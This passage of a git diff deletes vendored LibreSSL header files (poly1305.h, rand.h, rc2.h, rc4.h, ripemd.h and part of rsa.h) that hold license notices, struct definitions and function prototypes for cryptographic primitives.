-/* $OpenBSD: poly1305.h,v 1.3 2014/07/25 14:04:51 jsing Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_POLY1305_H
-#define HEADER_POLY1305_H
-
-#include <openssl/opensslconf.h>
-
-#if defined(OPENSSL_NO_POLY1305)
-#error Poly1305 is disabled.
-#endif
-
-#include <stddef.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct poly1305_context {
-	size_t aligner;
-	unsigned char opaque[136];
-} poly1305_context;
-
-typedef struct poly1305_context poly1305_state;
-
-void CRYPTO_poly1305_init(poly1305_context *ctx, const unsigned char key[32]);
-void CRYPTO_poly1305_update(poly1305_context *ctx, const unsigned char *in,
-    size_t len);
-void CRYPTO_poly1305_finish(poly1305_context *ctx, unsigned char mac[16]);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* HEADER_POLY1305_H */
diff --git a/thirdparty/libressl/include/openssl/rand.h b/thirdparty/libressl/include/openssl/rand.h
deleted file mode 100644
index fcb2e92..0000000
--- a/thirdparty/libressl/include/openssl/rand.h
+++ /dev/null
@@ -1,127 +0,0 @@
-/* $OpenBSD: rand.h,v 1.22 2014/10/22 14:02:52 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stdlib.h>
-
-#ifndef HEADER_RAND_H
-#define HEADER_RAND_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct rand_meth_st RAND_METHOD; */
-
-struct rand_meth_st {
-	void (*seed)(const void *buf, int num);
-	int (*bytes)(unsigned char *buf, int num);
-	void (*cleanup)(void);
-	void (*add)(const void *buf, int num, double entropy);
-	int (*pseudorand)(unsigned char *buf, int num);
-	int (*status)(void);
-};
-
-int RAND_set_rand_method(const RAND_METHOD *meth);
-const RAND_METHOD *RAND_get_rand_method(void);
-#ifndef OPENSSL_NO_ENGINE
-int RAND_set_rand_engine(ENGINE *engine);
-#endif
-RAND_METHOD *RAND_SSLeay(void);
-
-#ifndef LIBRESSL_INTERNAL
-void RAND_cleanup(void );
-int  RAND_bytes(unsigned char *buf, int num);
-int  RAND_pseudo_bytes(unsigned char *buf, int num);
-void RAND_seed(const void *buf, int num);
-void RAND_add(const void *buf, int num, double entropy);
-int  RAND_load_file(const char *file, long max_bytes);
-int  RAND_write_file(const char *file);
-const char *RAND_file_name(char *file, size_t num);
-int RAND_status(void);
-int RAND_poll(void);
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_RAND_strings(void);
-
-/* Error codes for the RAND functions. (no longer used) */
-
-/* Function codes. */
-#define RAND_F_RAND_GET_RAND_METHOD			 101
-#define RAND_F_RAND_INIT_FIPS				 102
-#define RAND_F_SSLEAY_RAND_BYTES			 100
-
-/* Reason codes. */
-#define RAND_R_DUAL_EC_DRBG_DISABLED			 104
-#define RAND_R_ERROR_INITIALISING_DRBG			 102
-#define RAND_R_ERROR_INSTANTIATING_DRBG			 103
-#define RAND_R_NO_FIPS_RANDOM_METHOD_SET		 101
-#define RAND_R_PRNG_NOT_SEEDED				 100
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/rc2.h b/thirdparty/libressl/include/openssl/rc2.h
deleted file mode 100644
index 21511ff..0000000
--- a/thirdparty/libressl/include/openssl/rc2.h
+++ /dev/null
@@ -1,101 +0,0 @@
-/* $OpenBSD: rc2.h,v 1.11 2014/07/10 22:45:57 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RC2_H
-#define HEADER_RC2_H
-
-#include <openssl/opensslconf.h> /* OPENSSL_NO_RC2, RC2_INT */
-
-#ifdef OPENSSL_NO_RC2
-#error RC2 is disabled.
-#endif
-
-#define RC2_ENCRYPT	1
-#define RC2_DECRYPT	0
-
-#define RC2_BLOCK	8
-#define RC2_KEY_LENGTH	16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct rc2_key_st
-	{
-	RC2_INT data[64];
-	} RC2_KEY;
-
-void RC2_set_key(RC2_KEY *key, int len, const unsigned char *data,int bits);
-void RC2_ecb_encrypt(const unsigned char *in,unsigned char *out,RC2_KEY *key,
-		     int enc);
-void RC2_encrypt(unsigned long *data,RC2_KEY *key);
-void RC2_decrypt(unsigned long *data,RC2_KEY *key);
-void RC2_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-	RC2_KEY *ks, unsigned char *iv, int enc);
-void RC2_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-		       long length, RC2_KEY *schedule, unsigned char *ivec,
-		       int *num, int enc);
-void RC2_ofb64_encrypt(const unsigned char *in, unsigned char *out,
-		       long length, RC2_KEY *schedule, unsigned char *ivec,
-		       int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/rc4.h b/thirdparty/libressl/include/openssl/rc4.h
deleted file mode 100644
index f59185e..0000000
--- a/thirdparty/libressl/include/openssl/rc4.h
+++ /dev/null
@@ -1,89 +0,0 @@
-/* $OpenBSD: rc4.h,v 1.13 2015/10/20 15:50:13 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RC4_H
-#define HEADER_RC4_H
-
-#include <openssl/opensslconf.h> /* OPENSSL_NO_RC4, RC4_INT */
-
-#ifdef OPENSSL_NO_RC4
-#error RC4 is disabled.
-#endif
-
-#include <stddef.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct rc4_key_st {
-	RC4_INT x, y;
-	RC4_INT data[256];
-} RC4_KEY;
-
-const char *RC4_options(void);
-void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
-void private_RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
-void RC4(RC4_KEY *key, size_t len, const unsigned char *indata,
-    unsigned char *outdata);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ripemd.h b/thirdparty/libressl/include/openssl/ripemd.h
deleted file mode 100644
index a5f3a12..0000000
--- a/thirdparty/libressl/include/openssl/ripemd.h
+++ /dev/null
@@ -1,105 +0,0 @@
-/* $OpenBSD: ripemd.h,v 1.14 2014/07/10 22:45:57 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_RIPEMD_H
-#define HEADER_RIPEMD_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_RIPEMD
-#error RIPEMD is disabled.
-#endif
-
-#if defined(__LP32__)
-#define RIPEMD160_LONG unsigned long
-#elif defined(__ILP64__)
-#define RIPEMD160_LONG unsigned long
-#define RIPEMD160_LONG_LOG2 3
-#else
-#define RIPEMD160_LONG unsigned int
-#endif
-
-#define RIPEMD160_CBLOCK	64
-#define RIPEMD160_LBLOCK	(RIPEMD160_CBLOCK/4)
-#define RIPEMD160_DIGEST_LENGTH	20
-
-typedef struct RIPEMD160state_st
-	{
-	RIPEMD160_LONG A,B,C,D,E;
-	RIPEMD160_LONG Nl,Nh;
-	RIPEMD160_LONG data[RIPEMD160_LBLOCK];
-	unsigned int   num;
-	} RIPEMD160_CTX;
-
-int RIPEMD160_Init(RIPEMD160_CTX *c);
-int RIPEMD160_Update(RIPEMD160_CTX *c, const void *data, size_t len);
-int RIPEMD160_Final(unsigned char *md, RIPEMD160_CTX *c);
-unsigned char *RIPEMD160(const unsigned char *d, size_t n,
-	unsigned char *md);
-void RIPEMD160_Transform(RIPEMD160_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/rsa.h b/thirdparty/libressl/include/openssl/rsa.h
deleted file mode 100644
index 7476a11..0000000
--- a/thirdparty/libressl/include/openssl/rsa.h
+++ /dev/null
@@ -1,550 +0,0 @@
-/* $OpenBSD: rsa.h,v 1.31 2017/08/30 16:07:35 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RSA_H
-#define HEADER_RSA_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/crypto.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef OPENSSL_NO_RSA
-#error RSA is disabled.
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Declared already in ossl_typ.h */
-/* typedef struct rsa_st RSA; */
-/* typedef struct rsa_meth_st RSA_METHOD; */
-
-struct rsa_meth_st {
-	const char *name;
-	int (*rsa_pub_enc)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_pub_dec)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_priv_enc)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_priv_dec)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_mod_exp)(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
-	    BN_CTX *ctx); /* Can be null */
-	int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); /* Can be null */
-	int (*init)(RSA *rsa);		/* called at new */
-	int (*finish)(RSA *rsa);	/* called at free */
-	int flags;			/* RSA_METHOD_FLAG_* things */
-	char *app_data;			/* may be needed! */
-/* New sign and verify functions: some libraries don't allow arbitrary data
- * to be signed/verified: this allows them to be used. Note: for this to work
- * the RSA_public_decrypt() and RSA_private_encrypt() should *NOT* be used
- * RSA_sign(), RSA_verify() should be used instead. Note: for backwards
- * compatibility this functionality is only enabled if the RSA_FLAG_SIGN_VER
- * option is set in 'flags'.
- */
-	int (*rsa_sign)(int type, const unsigned char *m, unsigned int m_length,
-	    unsigned char *sigret, unsigned int *siglen, const RSA *rsa);
-	int (*rsa_verify)(int dtype, const unsigned char *m,
-	    unsigned int m_length, const unsigned char *sigbuf,
-	    unsigned int siglen, const RSA *rsa);
-/* If this callback is NULL, the builtin software RSA key-gen will be used. This
- * is for behavioural compatibility whilst the code gets rewired, but one day
- * it would be nice to assume there are no such things as "builtin software"
- * implementations. */
-	int (*rsa_keygen)(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
-};
-
-struct rsa_st {
-	/* The first parameter is used to pickup errors where
-	 * this is passed instead of aEVP_PKEY, it is set to 0 */
-	int pad;
-	long version;
-	const RSA_METHOD *meth;
-	/* functional reference if 'meth' is ENGINE-provided */
-	ENGINE *engine;
-	BIGNUM *n;
-	BIGNUM *e;
-	BIGNUM *d;
-	BIGNUM *p;
-	BIGNUM *q;
-	BIGNUM *dmp1;
-	BIGNUM *dmq1;
-	BIGNUM *iqmp;
-	/* be careful using this if the RSA structure is shared */
-	CRYPTO_EX_DATA ex_data;
-	int references;
-	int flags;
-
-	/* Used to cache montgomery values */
-	BN_MONT_CTX *_method_mod_n;
-	BN_MONT_CTX *_method_mod_p;
-	BN_MONT_CTX *_method_mod_q;
-
-	/* all BIGNUM values are actually in the following data, if it is not
-	 * NULL */
-	BN_BLINDING *blinding;
-	BN_BLINDING *mt_blinding;
-};
-
-#ifndef OPENSSL_RSA_MAX_MODULUS_BITS
-# define OPENSSL_RSA_MAX_MODULUS_BITS	16384
-#endif
-
-#ifndef OPENSSL_RSA_SMALL_MODULUS_BITS
-# define OPENSSL_RSA_SMALL_MODULUS_BITS	3072
-#endif
-#ifndef OPENSSL_RSA_MAX_PUBEXP_BITS
-# define OPENSSL_RSA_MAX_PUBEXP_BITS	64 /* exponent limit enforced for "large" modulus only */
-#endif
-
-#define RSA_3	0x3L
-#define RSA_F4	0x10001L
-
-/* Don't check pub/private match. */
-#define RSA_METHOD_FLAG_NO_CHECK	0x0001
-
-#define RSA_FLAG_CACHE_PUBLIC		0x0002
-#define RSA_FLAG_CACHE_PRIVATE		0x0004
-#define RSA_FLAG_BLINDING		0x0008
-#define RSA_FLAG_THREAD_SAFE		0x0010
-
-/*
- * This flag means the private key operations will be handled by rsa_mod_exp
- * and that they do not depend on the private key components being present:
- * for example a key stored in external hardware. Without this flag bn_mod_exp
- * gets called when private key components are absent.
- */
-#define RSA_FLAG_EXT_PKEY		0x0020
-
-/*
- * This flag in the RSA_METHOD enables the new rsa_sign, rsa_verify functions.
- */
-#define RSA_FLAG_SIGN_VER		0x0040
-
-/*
- * The built-in RSA implementation uses blinding by default, but other engines
- * might not need it.
- */
-#define RSA_FLAG_NO_BLINDING		0x0080
-
-#define EVP_PKEY_CTX_set_rsa_padding(ctx, pad) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, EVP_PKEY_CTRL_RSA_PADDING, \
-				pad, NULL)
-
-#define EVP_PKEY_CTX_get_rsa_padding(ctx, ppad) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, \
-				EVP_PKEY_CTRL_GET_RSA_PADDING, 0, ppad)
-
-#define EVP_PKEY_CTX_set_rsa_pss_saltlen(ctx, len) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
-				(EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
-				EVP_PKEY_CTRL_RSA_PSS_SALTLEN, \
-				len, NULL)
-
-#define EVP_PKEY_CTX_get_rsa_pss_saltlen(ctx, plen) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
-				(EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
-				EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN, \
-				0, plen)
-
-#define EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, bits) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
-				EVP_PKEY_CTRL_RSA_KEYGEN_BITS, bits, NULL)
-
-#define EVP_PKEY_CTX_set_rsa_keygen_pubexp(ctx, pubexp) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
-				EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP, 0, pubexp)
-
-#define	 EVP_PKEY_CTX_set_rsa_mgf1_md(ctx, md)	\
-		EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_SIG,  \
-				EVP_PKEY_CTRL_RSA_MGF1_MD, 0, (void *)md)
-
-#define	 EVP_PKEY_CTX_get_rsa_mgf1_md(ctx, pmd)	\
-		EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_SIG,  \
-				EVP_PKEY_CTRL_GET_RSA_MGF1_MD, 0, (void *)pmd)
-
-#define EVP_PKEY_CTRL_RSA_PADDING	(EVP_PKEY_ALG_CTRL + 1)
-#define EVP_PKEY_CTRL_RSA_PSS_SALTLEN	(EVP_PKEY_ALG_CTRL + 2)
-
-#define EVP_PKEY_CTRL_RSA_KEYGEN_BITS	(EVP_PKEY_ALG_CTRL + 3)
